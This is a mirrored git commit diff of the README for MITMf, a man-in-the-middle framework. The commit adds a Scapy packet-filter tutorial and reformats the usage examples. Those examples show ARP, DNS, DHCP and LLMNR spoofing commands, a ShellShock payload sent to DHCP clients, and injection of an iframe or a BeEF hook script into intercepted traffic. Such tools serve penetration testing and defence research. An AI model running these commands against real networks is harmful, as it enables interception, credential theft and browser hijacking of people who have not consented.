mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-08-19 04:59:33 -07:00
added packet filter tutorial to README
This commit is contained in:
parent
a831236538
commit
307303ea58
1 changed files with 32 additions and 11 deletions
43
README.md
43
README.md
|
@ -16,7 +16,7 @@ Contact me at:
|
||||||
- IRC on Freenode: #MITMf
|
- IRC on Freenode: #MITMf
|
||||||
- Email: byt3bl33d3r@gmail.com
|
- Email: byt3bl33d3r@gmail.com
|
||||||
|
|
||||||
**Before submitting issues, please read the [FAQ](#faq) and [CONTRIBUTING.md](CONTRIBUTING.md).**
|
**Before submitting issues, please read the [CONTRIBUTING.md](CONTRIBUTING.md).**
|
||||||
|
|
||||||
Description
|
Description
|
||||||
============
|
============
|
||||||
|
@ -40,46 +40,67 @@ allowing users to modify any type of traffic or protocol.
|
||||||
|
|
||||||
- [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
|
- [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
|
||||||
|
|
||||||
|
Active packet filtering/modification
|
||||||
|
====================================
|
||||||
|
|
||||||
|
You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)
|
||||||
|
|
||||||
|
For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:
|
||||||
|
|
||||||
|
```
|
||||||
|
if packet.haslayer(ICMP):
|
||||||
|
packet.dst = '192.168.1.0'
|
||||||
|
|
||||||
|
```
|
||||||
|
- Use the ```packet``` variable to access the packet in a Scapy compatible format
|
||||||
|
- Use the ```data``` variable to access the raw packet data
|
||||||
|
|
||||||
|
Now to use the filter all we need to do is: ```python mitmf.py -F ~/filter.py```
|
||||||
|
|
||||||
|
You will probably want to combine that with the **Spoof** plugin to actually intercept packets from someone else ;)
|
||||||
|
|
||||||
Examples
|
Examples
|
||||||
========
|
========
|
||||||
|
|
||||||
The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:
|
The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:
|
||||||
|
|
||||||
- ```python mitmf.py -i enp3s0```
|
```python mitmf.py -i enp3s0```
|
||||||
|
|
||||||
ARP poison 192.168.1.0/24 with the gateway at 192.168.1.1 using the **Spoof** plugin:
|
ARP poison 192.168.1.0/24 with the gateway at 192.168.1.1 using the **Spoof** plugin:
|
||||||
|
|
||||||
- ```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
|
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
|
||||||
|
|
||||||
Same as above + a WPAD rogue proxy server using the **Responder** plugin:
|
Same as above + a WPAD rogue proxy server using the **Responder** plugin:
|
||||||
|
|
||||||
- ```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.0.0/24 --gateway 192.168.1.1 --responder --wpad```
|
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.0.0/24 --gateway 192.168.1.1 --responder --wpad```
|
||||||
|
|
||||||
Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
|
Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
|
||||||
|
|
||||||
- ```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
|
```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
|
||||||
|
|
||||||
Enable LLMNR/NBTNS/MDNS spoofing:
|
Enable LLMNR/NBTNS/MDNS spoofing:
|
||||||
|
|
||||||
- ```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
|
```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
|
||||||
|
|
||||||
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
|
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
|
||||||
|
|
||||||
- ```python mitmf.py -i enp3s0 --spoof --dhcp```
|
```python mitmf.py -i enp3s0 --spoof --dhcp```
|
||||||
|
|
||||||
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
|
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
|
||||||
|
|
||||||
- ```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
|
```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
|
||||||
|
|
||||||
Inject an HTML IFrame using the **Inject** plugin:
|
Inject an HTML IFrame using the **Inject** plugin:
|
||||||
|
|
||||||
- ```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
|
```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
|
||||||
|
|
||||||
Inject a JS script:
|
Inject a JS script:
|
||||||
|
|
||||||
- ```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
|
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
|
||||||
|
|
||||||
And much much more! Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
|
And much much more!
|
||||||
|
|
||||||
|
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
|
||||||
|
|
||||||
For a complete list of available options, just run ```python mitmf.py --help```
|
For a complete list of available options, just run ```python mitmf.py --help```
|
||||||
|
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue